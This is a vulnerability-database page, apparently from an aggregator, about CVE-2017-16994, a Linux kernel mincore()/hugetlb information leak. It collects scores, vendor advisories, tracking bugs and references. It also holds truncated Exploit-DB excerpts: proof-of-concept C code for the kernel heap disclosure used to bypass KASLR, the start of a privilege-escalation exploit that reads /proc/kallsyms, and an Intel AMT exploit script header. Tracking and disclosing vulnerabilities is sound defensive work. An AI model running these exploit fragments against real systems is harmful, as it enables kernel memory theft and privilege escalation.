CVE-2017-16994
published 2017-11-27CVE-2017-16994: The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain…
PriorityP430medium5.5CVSS 3.0
AVLACLPRLUINSUCHINAN
EXPLOIT
EPSS
2.08%
79.2th percentile
The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | linux | < linux 4.14.2-1 (bookworm) | linux 4.14.2-1 (bookworm) |
| linux | linux_kernel | < 4.14.2 | 4.14.2 |
| linux | linux_kernel | >= 0 < 4.14.2-1 | 4.14.2-1 |
| linux | linux_kernel | >= 0 < 4.14.2-1 | 4.14.2-1 |
| linux | linux_kernel | >= 0 < 4.14.2-1 | 4.14.2-1 |
| linux | linux_kernel | >= 0 < 4.14.2-1 | 4.14.2-1 |
| linux | linux_kernel | >= 0 < 4.4.0-119.143 | 4.4.0-119.143 |
CVSS provenance
nvdv3.05.5MEDIUMCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
nvdv2.02.1LOWAV:L/AC:L/Au:N/C:P/I:N/A:N
osv7.8HIGH
vendor_ubuntu7.8HIGH
vendor_debian5.5MEDIUM
vendor_redhat5.5MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Linux kernel (Azure) vulnerabilities
vendor_ubuntu·2018-04-24·CVSS 7.8
CVE-2017-0861 [HIGH] Linux kernel (Azure) vulnerabilities
Title: Linux kernel (Azure) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial of service (system crash) in the host OS.
(CVE-2017-1000407)
It was discovered that a use-after-free vulnerability existed in the
network namespaces implementation in the Linux kernel. A local attacker
could use this to cause a denial of servic
Ubuntu
Linux kernel (Xenial HWE) vulnerabilities
vendor_ubuntu·2018-04-05·CVSS 7.8
CVE-2017-0861 [HIGH] Linux kernel (Xenial HWE) vulnerabilities
Title: Linux kernel (Xenial HWE) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
USN-3619-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04
LTS. This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu
14.04 LTS.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2018-04-04·CVSS 7.8
CVE-2017-0861 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could
Ubuntu
Linux kernel (Raspberry Pi 2) vulnerabilities
vendor_ubuntu·2018-04-04·CVSS 7.8
CVE-2017-0861 [HIGH] Linux kernel (Raspberry Pi 2) vulnerabilities
Title: Linux kernel (Raspberry Pi 2) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that a use-after-free vulnerability existed in the
network namespaces implementation in the Linux kernel. A local attacker
could use this to cause a denial of service (system crash) or possibly
execute arbitrary code. (CVE-2017-15129)
Andrey Konovalov discovered that the usbtest device driver in the Linux
kernel did not properly validate endpoint metadata. A physically proximate
attacker coul
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu·2018-04-03·CVSS 7.8
CVE-2017-0861 [HIGH] Linux kernel vulnerabilities
Title: Linux kernel vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial of service (system crash) in the host OS.
(CVE-2017-1000407)
It was discovered that a use-after-free vulnerability existed in the
network namespaces implementation in the Linux kernel. A local attacker
could use this to cause a denial of service (syste
Ubuntu
Linux (HWE) vulnerabilities
vendor_ubuntu·2018-04-03·CVSS 7.8
CVE-2017-0861 [HIGH] Linux (HWE) vulnerabilities
Title: Linux (HWE) vulnerabilities
Summary: Several security issues were fixed in the Linux kernel.
USN-3617-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10.
This update provides the corresponding updates for the Linux Hardware
Enablement (HWE) kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS.
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial of service (system crash) in the host OS.
(CVE-2
Red Hat
kernel: mm/pagewalk.c: walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
vendor_redhat·2017-11-15·CVSS 5.5
CVE-2017-16994 [MEDIUM] CWE-200 kernel: mm/pagewalk.c: walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
kernel: mm/pagewalk.c: walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
The walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges. This allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
Statement: This issue does not affect the Linux kernel packages as shipped with Red Hat Enterprise Linux 5, 6, 7 and Red Hat Enterprise MRG 2, as a co
Debian
CVE-2017-16994: linux - The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14...
vendor_debian·2017·CVSS 5.5
CVE-2017-16994 [MEDIUM] CVE-2017-16994: linux - The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14...
The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
Scope: local
bookworm: resolved (fixed in 4.14.2-1)
bullseye: resolved (fixed in 4.14.2-1)
forky: resolved (fixed in 4.14.2-1)
sid: resolved (fixed in 4.14.2-1)
trixie: resolved (fixed in 4.14.2-1)
GHSA
GHSA-3h5j-qwmx-f9m6: The walk_hugetlb_range function in mm/pagewalk
ghsa_unreviewed·2022-05-14
CVE-2017-16994 [MEDIUM] CWE-200 GHSA-3h5j-qwmx-f9m6: The walk_hugetlb_range function in mm/pagewalk
The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
OSV
linux-azure vulnerabilities
osv·2018-04-24·CVSS 7.8
CVE-2017-0861 [HIGH] linux-azure vulnerabilities
linux-azure vulnerabilities
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial of service (system crash) in the host OS.
(CVE-2017-1000407)
It was discovered that a use-after-free vulnerability existed in the
network namespaces implementation in the Linux kernel. A local attacker
could use this to cause a denial of service (system crash) or possibly
execute arbitrary code. (CVE-2017-15129)
It was disc
OSV
linux-lts-xenial, linux-aws vulnerabilities
osv·2018-04-05·CVSS 7.8
[HIGH] linux-lts-xenial, linux-aws vulnerabilities
linux-lts-xenial, linux-aws vulnerabilities
USN-3619-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04
LTS. This update provides the corresponding updates for the Linux
Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu
14.04 LTS.
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-08
OSV
linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities
osv·2018-04-04·CVSS 7.8
CVE-2017-16995 [HIGH] linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities
linux, linux-aws, linux-kvm, linux-raspi2, linux-snapdragon vulnerabilities
Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation
in the Linux kernel improperly performed sign extension in some situations.
A local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-16995)
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial
OSV
linux-hwe, linux-gcp, linux-oem vulnerabilities
osv·2018-04-03·CVSS 7.8
[HIGH] linux-hwe, linux-gcp, linux-oem vulnerabilities
linux-hwe, linux-gcp, linux-oem vulnerabilities
USN-3617-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10.
This update provides the corresponding updates for the Linux Hardware
Enablement (HWE) kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS.
It was discovered that a race condition leading to a use-after-free
vulnerability existed in the ALSA PCM subsystem of the Linux kernel. A
local attacker could use this to cause a denial of service (system crash)
or possibly execute arbitrary code. (CVE-2017-0861)
It was discovered that the KVM implementation in the Linux kernel allowed
passthrough of the diagnostic I/O port 0x80. An attacker in a guest VM
could use this to cause a denial of service (system crash) in the host OS.
(CVE-2017-1000407)
It was discovered that a use-after-free
OSV
CVE-2017-16994: The walk_hugetlb_range function in mm/pagewalk
osv·2017-11-27·CVSS 5.5
CVE-2017-16994 [MEDIUM] CVE-2017-16994: The walk_hugetlb_range function in mm/pagewalk
The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
No detection rules found.
Exploit-DB
Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation
exploitdb·2017-12-11
CVE-2017-16994 Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation
Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation
---
/** disable_map_min_add.c **/
/*
*
*/
#include
#include
#include
#include
#include
#include
#include
/* offsets might differ, kernel was custom compiled
* you can read vmlinux and caculate the offset when testing
*/
/*
#define OFFSET_KERNEL_BASE 0x000000
*/
#define MMAP_MIN_ADDR 0x1101de8
#define DAC_MMAP_MIN_ADDR 0xe8e810
/* get kernel functions address by reading /proc/kallsyms */
unsigned long get_kernel_sym(char *name)
{
FILE *f;
unsigned long addr;
char dummy;
char sname[256];
int ret = 0;
f = fopen("/proc/kallsyms", "r");
if (f == NULL) {
printf("[-] Failed to open /proc/kallsyms\n");
exit(-1);
}
printf("[+] Find %s...\n", name);
while(ret != EOF) {
ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
if (r
Exploit-DB
Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)
exploitdb·2017-12-11
CVE-2017-16994 Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)
Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)
---
/*
* The source is modified from
* https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
* I try to find out infomation useful from the infoleak
* The kernel address can be easily found out from the uninitialized memory
* leaked from kernel, which can help bypass kaslr
*/
#define _GNU_SOURCE
#include
#include
#include
#include
int main(void) {
unsigned char buf[getpagesize()/sizeof(unsigned char)];
int right = 1;
unsigned long addr = 0;
/* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE, MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED)
err(1, "mmap");
while(right){
/* Touch a mishandle with this type mapping */
if (mincore((void*)0x86000000,
Exploit-DB
Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure
exploitdb·2017-11-24
CVE-2017-16994 Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure
Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure
---
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
I found the following bug with an AFL-based fuzzer:
When __walk_page_range() is used on a VM_HUGETLB VMA, callbacks from the mm_walk structure are only invoked for present pages. However, do_mincore() assumes that it will always get callbacks for all pages in the range passed to walk_page_range(), and when this assumption is violated, sys_mincore() copies uninitialized memory from the page allocator to userspace.
This bug can be reproduced with the following testcase:
$ cat mincore_test.c
*/
#define _GNU_SOURCE
#include
#include
#include
#include
unsigned char mcbuf[0x1000];
int main(void) {
if (mmap((void*)0x66000000, 0x20000000000, PR
Exploit-DB
Intel Active Management Technology - System Privileges
exploitdb·2017-05-10·CVSS 9.8
CVE-2017-5689 [CRITICAL] Intel Active Management Technology - System Privileges
Intel Active Management Technology - System Privileges
---
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: Nixawk
# CVE-2017-5689 = {
# dork="Server: Intel(R) Active Management Technology" port:"16992",
# ports=[
# 623,
# 664,
# 16992,
# 16993,
# 16994,
# 16995
# ]
# products=[
# Active Management Technology (AMT),
# Intel Standard Manageability (ISM),
# Intel Small Business Technology (SBT)
# ]
# version=[
# 6.x,
# 7.x,
# 8.x,
# 9.x,
# 10.x,
# 11.0,
# 11.5,
# 11.6
# ]
import functools
import requests
import logging
import uuid
logging.basicConfig(level=logging.INFO, format="%(message)s")
log = logging.getLogger(__file__)
TIMEOUT = 8
def handle_exception(func):
functools.wraps(func)
def wrapper(*args, **kwds):
try:
return func(*args, **kwds)
except Exception as err:
log.error
Bugzilla
CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak [fedora-all]
bugzilla·2017-11-28·CVSS 5.5
CVE-2017-16994 [MEDIUM] CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak [fedora-all]
CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit me
Bugzilla
CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
bugzilla·2017-11-28·CVSS 5.5
CVE-2017-16994 [MEDIUM] CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
CVE-2017-16994 kernel: mm/pagewalk.c:walk_hugetlb_range function mishandles holes in hugetlb ranges causing information leak
The walk_hugetlb_range() function in 'mm/pagewalk.c' file in the Linux kernel from v4.0-rc1 through v4.15-rc1 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.
References:
https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
https://www.exploit-db.com/exploits/43178/
A flaw was introduced by:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1e25a271c8ac1c9faebf4eb3fa609189e4e7b1b6
An upstream patch:
https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=373c4557d2aa362702c4c2d41
http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=373c4557d2aa362702c4c2d41288fb1e54990b7chttp://www.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.14.2http://www.securityfocus.com/bid/101969https://access.redhat.com/errata/RHSA-2018:0502https://bugs.chromium.org/p/project-zero/issues/detail?id=1431https://github.com/torvalds/linux/commit/373c4557d2aa362702c4c2d41288fb1e54990b7chttps://usn.ubuntu.com/3617-1/https://usn.ubuntu.com/3617-2/https://usn.ubuntu.com/3617-3/https://usn.ubuntu.com/3619-1/https://usn.ubuntu.com/3619-2/https://usn.ubuntu.com/3632-1/https://www.exploit-db.com/exploits/43178/http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=373c4557d2aa362702c4c2d41288fb1e54990b7chttp://www.kernel.org/pub/linux/kernel/v4.x/ChangeLog-4.14.2http://www.securityfocus.com/bid/101969https://access.redhat.com/errata/RHSA-2018:0502https://bugs.chromium.org/p/project-zero/issues/detail?id=1431https://github.com/torvalds/linux/commit/373c4557d2aa362702c4c2d41288fb1e54990b7chttps://usn.ubuntu.com/3617-1/https://usn.ubuntu.com/3617-2/https://usn.ubuntu.com/3617-3/https://usn.ubuntu.com/3619-1/https://usn.ubuntu.com/3619-2/https://usn.ubuntu.com/3632-1/https://www.exploit-db.com/exploits/43178/
2017-11-27
Published